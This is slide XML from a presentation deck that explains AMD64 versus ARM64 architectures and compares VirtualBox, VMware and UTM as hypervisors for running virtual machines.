          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757124" y="1922984"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1933956"/>
            <a:ext cx="281178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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>AMD64 (x86_64)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Google Shape;595;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2537460"/>
            <a:ext cx="349758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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Nearly every Windows laptop/desktop and Intel-based Mac. This is the "normal" architecture most people mean by default.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3634740"/>
            <a:ext cx="349758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1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Use with: VirtualBox or VMware</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="1645920"/>
            <a:ext cx="3909060" cy="2811780"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1951" name="adj"/>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98" name="Google Shape;598;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="1851660"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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apple-white.png" id="599" name="Google Shape;599;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5031029" y="1944929"/>
            <a:ext cx="362102" cy="362102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Google Shape;600;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="1933956"/>
            <a:ext cx="281178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400"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>ARM64 (Apple Silicon)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Google Shape;601;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2537460"/>
            <a:ext cx="3497580" cy="8915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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Every Mac with an M1, M2, M3, or M4 chip (2020 or newer). Also most Raspberry Pi boards.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="3634740"/>
            <a:ext cx="349758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900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Use with: UTM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4594860"/>
            <a:ext cx="81610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1" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Not sure which Mac you have? Apple menu &gt; About This Mac. If it says "Chip: Apple M-something," you're ARM64.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Google Shape;604;p33"/>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Know your architecture</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p33"/>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0" name="Shape 610"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Google Shape;611;p34"/>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CHOOSING A HYPERVISOR</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p34"/>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Choosing your hypervisor</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Google Shape;613;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="2640330" cy="3154680"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 2078"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4" name="Google Shape;614;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1491615" y="1611630"/>
            <a:ext cx="617220" cy="6172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virtualbox-white.png" id="615" name="Google Shape;615;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584198" y="1704213"/>
            <a:ext cx="432054" cy="432054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="2331720"/>
            <a:ext cx="243459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VirtualBox</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="270891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PLATFORM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="288036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Windows, Linux, Intel Mac</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="329184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ARCHITECTURE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="346329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AMD64</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Google Shape;621;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="387477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COST</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Google Shape;622;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="404622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Free &amp; open source</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Google Shape;623;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="1405890"/>
            <a:ext cx="2640330" cy="3154680"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 2078"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4" name="Google Shape;624;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337685" y="1611630"/>
            <a:ext cx="617220" cy="6172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assets/vmware-white.png" id="625" name="Google Shape;625;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4430268" y="1704213"/>
            <a:ext cx="432054" cy="432054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Google Shape;626;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2331720"/>
            <a:ext cx="243459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VMware</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="270891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PLATFORM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="288036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Workstation (Win/Linux), Fusion (Mac)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="329184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ARCHITECTURE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="346329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AMD64 (Fusion also runs on Apple Silicon)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="387477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COST</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="404622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Free for personal use</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Google Shape;633;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1405890"/>
            <a:ext cx="2640330" cy="3154680"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 2078"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4" name="Google Shape;634;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183755" y="1611630"/>
            <a:ext cx="617220" cy="6172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635" name="Google Shape;635;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7263994" y="1691869"/>
            <a:ext cx="456743" cy="456742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275070" y="2331720"/>
            <a:ext cx="2434590" cy="2743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B1E1D"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>UTM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="270891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PLATFORM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="288036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macOS (Apple Silicon or Intel)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="329184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ARCHITECTURE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Google Shape;640;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="346329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ARM64 native, AMD64 emulated</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Google Shape;641;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="3874770"/>
            <a:ext cx="2297430" cy="17145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700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>COST</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
